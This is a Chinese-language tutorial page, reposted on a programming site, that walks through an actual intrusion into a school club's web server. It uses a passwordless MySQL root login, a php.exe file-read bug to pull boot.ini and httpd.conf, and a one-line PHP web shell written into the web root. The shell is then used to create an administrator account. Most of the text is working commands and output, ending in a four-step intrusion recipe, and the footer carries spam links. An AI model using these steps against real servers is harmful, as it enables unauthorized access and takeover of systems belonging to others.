<em id="i3oiu"></em>
  1. <tbody id="i3oiu"></tbody>
  2. 數科鏈接網全力打造:網頁編程、軟件開發編程、平面設計、服務器端開發、操作系統等在線學習平臺!學編程,上數科鏈接網!
    SEO優化>> 百度優化 谷歌優化 研究探討 優化技巧 網絡營銷 優化心得 SEO前沿 ASP技術 PHP技術 asp.net技術 MSSQL學習 MYSQL學習 服務器技術 操作系統 Javascript
    當前位置:首頁 > SEO優化 > MYSQL學習
    上一節 下一節
     看緊你的3306端口,一次通過mysql的入侵

    用superscan掃了一下
    某個c類的網段,尋找開放80端口的機器,結果就只有一臺機器
    開放了80端口,試著連了一下,是我們學校某個社團的的主頁。
    從端口的banner來看應該是apache(win32),證實一下
    telnet 211.87.xxx.xxx
    get(回車)
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <HTML><HEAD>
    <TITLE>501 Method
    Not Implemented</TITLE>
    </HEAD><BODY>
    <H1>Method Not Implemented</H1>
    get to /index
    .html not supported.<P>
    Invalid method in request get<P>
    <HR>
    <ADDRESS>Apache/1.3.2
    2 Server at www.xxxxxx.com Port 80</ADDRESS>
    </BODY></HTML> 
     

     

    遺失對主機的連接。
    C:\>
    呵呵,這下看得更清楚了

     

    據我猜測,應該是"apache+mysql+php"的黃金組合吧
    習慣性的mysql -h 211.87.xxx.xxx
    果然連上了
    Welcome to the MySQL monitor. Commands end with or \g.
    Your MySQL connection id is 17 to server version: 3.23.53-max-nt


    Type help; or \h for help. Type \c to clear the buffer.


    mysql>


    斷開試著
    mysql -h 211.87.xxx.xxx -u root -p
    password:
    Welcome to the MySQL monitor. Commands end with or \g.
    Your MySQL connection id is 18 to server version: 3.23.53-max-nt


    Type help; or \h for help. Type \c to clear the buffer.


    mysql>
    呵呵,大家看到了他的root用戶沒有密碼,這是我今天要說的第一個主題。
    這是相當的危險的,碰見這種情況,有99.999%的可能可以進入
    既然使用的apache+php,只要找到他在本地存放的web的物理路徑就為所欲為了
    呵呵
    下一個問題是我今天要說的重點怎么樣才能知道那臺主機的存放的web的物理路徑?
    方法有很多種,在這里我介紹2種方法供初學者參考
    首先要告訴大家的是低版本的apache+php有一個漏洞
    http://xxx.xxxx.xxx.xxx/php/php.exe?對方的物理文件名
    就可以把那個物理文件下載下來。


    于是提http://211.87.xxx.xxx/php/php.exe?c:\a.txt
    返回
    No input file specified. (沒有這個漏洞的話提示找不到網頁)
    好的,這說明他有這個漏洞。
    在提http://211.87.xxx.xxx/php/php.exe?c:\boot.ini
    返回
    [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating


    systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional"


    /fastdetect
    呵呵,裝的還是xp。
    好了,我們可以猜測對方apache的conf文件的物理位置了
    http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf
    No input file specified.
    http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf
    No input file specified.
    http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf
    No input file specified.
    http://211.87.xxx.xxx/php/php.exe?c:\Program Files\apache\conf\httpd.conf
    No input file specified.
    http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf
    猜到了,返回了好多東西
    找到我們想要的
    # DocumentRoot: The directory out of which you will serve your
    # documents. By default, all requests are taken from this directory, but
    # symbolic links and aliases may be used to point to other locations.
    #
    DocumentRoot "D:\homepage"
    看得出來對方的主目錄是D:\homepage
    下面的事就好辦了,現在就想得到shell?
    先別急,我們先來看看另一種方法
    那就是利用mysql的錯誤
    隨便的瀏覽一下他的網頁找到一處利用mysql的地方
    http://211.87.xxx.xxx/skonline/study/list.php?id=14


    長得太帥了,哈哈哈哈
    提交
    http://211.87.xxx.xxx/skonline/study/list.php?id=14
    返回
    Warning: Supplied argument is not a valid MySQL result resource in


    d:\homepage\skonline\study\list.php on line 231
    呵呵,一覽無余。
    然后,然后就是制造我們的shell
    mysql -h 211.87.xxx.xxx -u root -p
    password:
    Welcome to the MySQL monitor. Commands end with or \g.
    Your MySQL connection id is 18 to server version: 3.23.53-max-nt


    Type help; or \h for help. Type \c to clear the buffer.


    mysql> use test;
    Database changed
    mysql> create table t(cmd text);
    Query OK, 0 rows affected (0.08 sec)


    mysql> insert into t values(<?system($c);?>);
    Query OK, 1 row affected (12.52 sec)


    mysql> select * from t into d:\\homepage\\test.php;


    我的shell很簡單<?system($c);?>,不到20個字符,但他已經足夠了
    可以讓我執行任意命令,由此足以看出php的強大。


    怎么用?
    提交
    http://211.87.xxx.xxx/test.php?c=net ;user kid /add
    命令成功完成
    http://211.87.xxx.xxx/test.php?c=net ;localgroup administrators kid /add
    命令成功完成


    呵呵,測試成功,通過!
    剩下的就是你自由發揮了。


    由此我們不難總結出這一類的入侵步驟:
    1,找到沒有密碼的3306端口
    2,找到對方的web物理路徑
    3,制造shell
    4,后續工作


    呵呵,在這里提醒大家,如果你想要或正在用mysql的時候
    千萬要給自己的root設上一個強有力的密碼。
    看緊你的3306,呵呵。



    申明:本文章由數科軟文網編輯整理并發布,如文中有侵權行為,請與本站客服聯系(QQ:254677821)!
    上一節 下一節
    相關教程  
    其他教程  
    站長軟文  
    百度優化
    谷歌優化
    研究探討
    優化技巧
    網絡營銷
    優化心得
    SEO前沿

    Copyright©數科鏈接網 版權所有 寧網通旗下網站 蘇ICP備08109594號-2
    站長QQ:254677821 電話:18013800932
    济公高手论坛最全最准 成都市| 婺源县| 多伦县| 新绛县| 贺州市| 安岳县| 长乐市| 通河县| 苏州市| 合川市| 轮台县| 米泉市| 唐海县| 登封市| 林州市| 普洱| 新宾| 赫章县| 金阳县| 灌南县| 江永县| 山阳县| 闻喜县| 盈江县| 偃师市| 河东区| 波密县| 怀集县| 裕民县| 招远市| 佛教| 苍山县| 沁源县| 荥经县| 吉木乃县| 图们市| 涞水县| 剑川县| 齐齐哈尔市| 团风县| 滕州市| http://www.lsjzsv.pw http://v.lsj4yz.pw http://www.089realestate.top http://www.087lesbian.top http://china.sina4bq.pw http://m5.zoqd0u.top